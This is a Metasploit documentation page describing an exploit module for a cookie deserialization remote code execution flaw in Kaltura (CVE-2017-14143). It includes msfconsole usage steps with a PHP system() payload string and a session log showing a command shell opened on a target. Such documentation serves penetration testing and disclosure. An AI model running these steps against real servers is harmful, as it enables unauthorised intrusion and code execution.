adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md
T
bwatters-r7 04806bc84a Updates to documentation per h00die
2018-01-23 12:44:39 -06:00

1.6 KiB
Raw Blame History

Description

The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie.

Vulnerable Application

This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization. Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143. Installation of Kaltura is difficult, but here is an installation guide: https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/http/kaltura_unserialize_cookie_rce
  3. set RHOST https://example.com (or IP address)
  4. set ENTRYID 0_xxxxxxxx
  5. set payload generic/custom
  6. set payloadstr "system('command you want to execute, eg.- ls -la');"
  7. run

Scenarios

msf use exploits/linux/http/kaltura_unserialize_cookie_rce
msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202
RHOST => 46.101.209.202
msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16
LHOST => 192.168.1.16
msf exploit(kalkutra_unseialize_cookie_rce)>check
[+] 46.101.209.202:4444 The target is vulnerable.
msf exploit(kalkutra_unseialize_cookie_rce)>run
[*] Started bind handler
[*] Output:
[*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reference in New Issue View Git Blame Copy Permalink